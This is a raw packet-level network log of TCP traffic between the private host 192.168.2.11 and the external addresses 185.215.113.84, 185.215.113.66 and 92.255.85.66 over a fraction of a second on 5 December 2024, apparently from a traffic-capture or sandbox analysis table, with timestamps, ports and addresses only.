Dec 5, 2024 17:32:13.988217115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.988255978 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.988295078 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.989516020 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.989594936 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.989681005 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.989716053 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.991113901 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.991202116 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.991249084 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.992769957 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.992826939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.992899895 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.992938995 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.994435072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.994530916 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.994580030 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.995965958 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.996012926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.996181965 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.996217966 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.997543097 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.997584105 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.997999907 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.999438047 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.999473095 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.999494076 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.999519110 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.001019001 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.001060009 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.001323938 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.001358032 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.002441883 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.002863884 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.002912045 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.004004955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.004050970 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.004120111 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.004156113 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.005654097 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.005702019 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.005743980 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.007237911 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.007320881 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.007360935 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.007416010 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.008842945 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.008897066 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.009152889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.009200096 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.010464907 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.010540962 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.010586977 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.012115002 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.012156963 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.012159109 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.012190104 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.013827085 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.014064074 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.014106989 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.015280008 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.015321970 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.015357018 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.015388012 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.016904116 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.016949892 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.017077923 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.017117023 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.018517971 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.018646955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.018707991 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.020122051 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.020174026 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.020351887 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.020391941 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.021802902 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.021850109 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.021909952 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.023307085 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.023367882 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.023544073 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.023586035 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.025005102 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.025053978 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.025118113 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.025161982 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.026540995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.026674986 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.026719093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.028197050 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.028239012 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.028522968 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.028561115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.029774904 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.030303955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.030348063 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.031445026 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.031491041 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.031507969 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.031541109 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.033054113 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.033102036 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.033325911 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.033370972 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.034657001 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.035372019 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.035425901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.036391020 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.036402941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.036429882 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.036458015 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.037858963 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.038671970 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.038729906 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.039496899 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.039545059 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.040209055 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.040252924 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.041069984 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.041121006 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.041239977 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.041273117 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.042763948 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.042850018 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.042895079 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.043165922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.043200016 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.043776035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.043833971 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.043850899 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.044238091 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.044285059 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.044342041 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.044859886 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.045161009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.045797110 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.046073914 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.046145916 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.047163963 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.047216892 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.047256947 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.048523903 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.048593044 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.048732996 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.048772097 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.049767017 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.049892902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.049947023 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.050681114 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.050962925 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.051032066 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.051687956 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.051980019 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.052037001 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.053019047 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.053030968 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.053113937 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.054006100 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.055085897 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.055156946 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.055166960 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.055181026 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.055222988 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.056288958 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.057425976 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.057437897 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.057496071 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.057545900 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.057811975 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.058578968 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.058590889 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.058639050 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.059639931 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.059770107 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.059820890 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.060772896 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.061323881 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.061377048 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.061924934 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.062055111 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.062112093 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.063098907 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.063330889 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.063755035 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.064224005 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.064666986 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.064707041 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.066174984 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.066366911 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.066462040 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.066780090 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.066978931 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.067055941 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.068003893 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.068257093 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.068778992 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.068959951 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.069185972 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.069267035 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.070106983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.070276022 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.070322037 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.071084976 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.071584940 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.072309971 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.072362900 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.072386980 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.072892904 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.073322058 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.073520899 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.074655056 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.074727058 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.074753046 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.074901104 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.075625896 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.075829983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.075875044 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.076693058 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.076896906 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.076946974 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.077651024 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:14.077733994 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:14.077884912 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.078006983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.078141928 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.078625917 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.078682899 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.079144001 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.079559088 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.079648972 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.080300093 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.080312014 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.080355883 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.081264019 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.081367970 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.082397938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.082465887 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.082510948 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.083302975 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.083623886 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.083779097 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.084675074 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.084764004 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.085026979 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.085947990 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.086014032 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.086138964 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.086994886 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.087022066 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.087069035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.087771893 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.088182926 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.088423014 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.089278936 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.089323044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.089324951 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.089373112 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.090388060 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.090498924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.090562105 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.091550112 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.091711044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.091825962 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.092629910 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.093170881 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.094002008 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.094048977 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.094068050 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.094167948 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.094932079 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.095076084 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.095148087 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.096066952 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.096242905 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.096297979 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.097230911 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.097815037 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.097899914 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.098381996 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.098834038 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.099348068 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.099534988 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.099554062 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.099611044 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.100630999 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.100907087 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.100964069 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.101737976 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.101859093 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.102133036 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.102838039 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.119127035 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.119199991 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.151767015 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.151782990 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.151853085 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.152173996 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.152218103 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.152359962 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.152398109 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.153743982 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.153793097 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.153875113 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.153907061 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.155044079 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.155112982 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.155154943 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.156449080 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.156510115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.156543016 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.156579971 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.157840014 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.157885075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.158016920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.158050060 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.159248114 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.159302950 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.159523010 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.159560919 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.160727978 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.160845995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.160892010 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.161952972 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.162003994 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.162085056 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.162118912 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.163260937 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.163310051 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.163350105 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.163383961 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.164592981 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.164783955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.164829016 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.165921926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.165970087 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.166250944 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.166287899 CET	49793	80	192.168.2.11	185.215.113.84
